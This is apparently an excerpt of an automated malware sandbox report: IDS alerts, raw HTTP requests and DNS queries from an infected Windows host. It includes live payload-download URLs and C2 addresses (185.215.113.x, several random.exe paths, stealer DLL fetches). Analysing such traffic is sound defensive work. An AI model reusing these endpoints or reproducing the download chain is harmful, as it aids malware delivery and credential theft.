Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49769 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49746 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49776 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49834 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49871 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49874 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49882 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49894 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49910 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49915 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49922 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49933 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49950 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49951 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49958 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49969 -> 172.67.139.144:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49970 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49982 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49991 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49999 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49954 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50020 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50028 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50036 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50054 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50062 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50083 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50086 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50088 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50090 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50093 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50094 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50100 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50108 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50115 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50123 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50133 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50140 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50139 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50138 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50146 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50147 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50148 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50149 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50151 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50150 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50153 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50141 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50154 -> 172.67.181.203:443

Source: unknown

HTTPS traffic detected: 172.67.75.172:443 -> 192.168.2.4:50074 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C47CC60 PR_Recv,

2_2_6C47CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/martin1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /ZhnSMEmOyBahvsfTCosA1738232489?argument=0 HTTP/1.1Host: home.fivegg5th.topAccept: /
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/Savelij_sL/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/Jz1e1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/drainisback/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: warlikedbeliev.org
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fivegg5th.top
Source: global traffic	DNS traffic detected: DNS query: rampnatleadk.click
Source: global traffic	DNS traffic detected: DNS query: api.ip.sb
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: getyour.cyou
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: youtube.com
